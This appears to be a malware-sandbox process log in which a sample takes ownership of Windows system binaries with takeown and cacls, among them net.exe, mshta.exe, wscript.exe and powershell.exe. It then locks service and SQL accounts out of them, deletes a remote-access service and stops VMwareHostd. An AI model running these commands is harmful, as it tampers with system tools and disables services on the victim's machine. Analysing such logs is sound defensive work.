C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Users:r4⤵PID:1776
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /g Administrators:f4⤵PID:832
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /g Administrators:r4⤵PID:268
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1872
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d SERVICE4⤵PID:1104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1848
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssqlserver4⤵PID:1724
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d "network service"4⤵PID:1504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1064
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d system4⤵PID:1384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:720
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress4⤵PID:1016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net.exe /a4⤵
- Modifies file permissions
PID:1728
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Users:r4⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:544
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /g Administrators:f4⤵PID:1332
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d SERVICE4⤵PID:2036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1388
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r4⤵PID:1532
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1552
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver4⤵PID:560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:912
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d system4⤵PID:1812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:980
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d "network service"4⤵PID:748
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\net1.exe /a4⤵
- Modifies file permissions
PID:2028
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress4⤵PID:608
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:752
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /g Administrators:f4⤵PID:664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:280
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1328
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Users:r4⤵PID:1408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1776
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d SERVICE4⤵PID:272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:996
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /g Administrators:r4⤵PID:924
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1848
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d "network service"4⤵PID:1836
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssqlserver4⤵PID:1944
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1060
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress4⤵PID:952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1504
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\net1.exe /e /d system4⤵PID:1064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1384
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\net1.exe /a4⤵
- Modifies file permissions
PID:1272
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Users:r4⤵PID:1016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:792
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /g Administrators:f4⤵PID:1948
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE4⤵PID:544
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1004
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r4⤵PID:556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:384
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d "network service"4⤵PID:1688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1628
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver4⤵PID:916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:796
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d system4⤵PID:1664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1632
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\mshta.exe /a4⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1096
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress4⤵PID:1552
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /g Administrators:f4⤵PID:868
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1168
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Users:r4⤵PID:832
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /g Administrators:r4⤵PID:1580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1568
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d SERVICE4⤵PID:1744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1180
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d "network service"4⤵PID:996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1108
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssqlserver4⤵PID:1328
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d system4⤵PID:1732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:108
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress4⤵PID:1848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\mshta.exe /a4⤵
- Modifies file permissions
PID:1276
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f4⤵PID:1064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1736
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r4⤵PID:952
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1384
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r4⤵PID:1788
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE4⤵PID:1728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1792
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver4⤵PID:1332
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:2040
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"4⤵PID:1004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1928
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d system4⤵PID:1532
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\FTP.exe /a4⤵
- Modifies file permissions
PID:560
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress4⤵PID:1932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:2036
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /g Administrators:f4⤵PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1664
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Users:r4⤵PID:704
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /g Administrators:r4⤵PID:1580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1780
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1328
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d SERVICE4⤵PID:1180
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssqlserver4⤵PID:1000
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d "network service"4⤵PID:1104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:996
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d system4⤵PID:108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1732
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress4⤵PID:1276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1848
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f4⤵PID:1172
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1064
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\FTP.exe /a4⤵
- Modifies file permissions
PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:952
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r4⤵PID:1948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1788
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r4⤵PID:1612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1728
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE4⤵PID:556
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1880
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver4⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1388
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"4⤵PID:1532
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d system4⤵PID:1628
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:912
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress4⤵PID:1620
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\wscript.exe /a4⤵
- Modifies file permissions
PID:524
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:456
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /g Administrators:f4⤵
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1168
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Users:r4⤵PID:1392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1744
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /g Administrators:r4⤵PID:1180
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d SERVICE4⤵PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:828
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssqlserver4⤵PID:1104
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1724
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d "network service"4⤵PID:108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1848
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d system4⤵PID:1504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:720
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress4⤵PID:292
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\wscript.exe /a4⤵
- Modifies file permissions
PID:1636
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f4⤵PID:1788
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1948
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r4⤵PID:384
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1612
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:684
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r4⤵PID:544
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE4⤵PID:916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1820
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver4⤵PID:1532
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"4⤵PID:560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1664
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d system4⤵PID:1552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:704
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress4⤵PID:1776
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\cscript.exe /a4⤵
- Modifies file permissions
PID:1408
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1488
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /g Administrators:f4⤵PID:1780
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Users:r4⤵PID:1108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1872
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:996
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /g Administrators:r4⤵PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1876
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d SERVICE4⤵PID:108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1564
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssqlserver4⤵PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1064
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d "network service"4⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:952
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d system4⤵PID:1636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1948
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress4⤵PID:1788
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f4⤵PID:1880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:556
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\cscript.exe /a4⤵
- Modifies file permissions
PID:1728
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r4⤵PID:1980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1004
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE4⤵PID:1632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1928
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r4⤵PID:1668
-
C:\Windows\SysWOW64\sc.exesc delete "XT800Service_Personal"5⤵PID:1612
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:916
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver4⤵PID:1932
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2036
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d system4⤵PID:1320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:704
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress4⤵PID:924
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"4⤵PID:1664
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:560
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f4⤵PID:1060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1328
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a4⤵
- Modifies file permissions
PID:1392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1180
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r4⤵PID:1000
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r4⤵PID:1732
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2004
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1876
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver4⤵PID:1504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1276
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE4⤵PID:1808
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system4⤵PID:1636
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:952
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"4⤵PID:1064
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1960
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress4⤵PID:1948
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1272
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:220
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a4⤵
- Modifies file permissions
PID:212
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f4⤵PID:228
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r4⤵PID:684
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1056
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r4⤵PID:2044
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:384
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE4⤵PID:968
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1864
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1688
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop VMwareHostd5⤵PID:212
-
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"4⤵PID:1324
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver4⤵PID:2040
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1332
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system4⤵PID:1820
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1304
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1396
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress4⤵PID:1628
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /g Administrators:f4⤵PID:560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1620
-
-
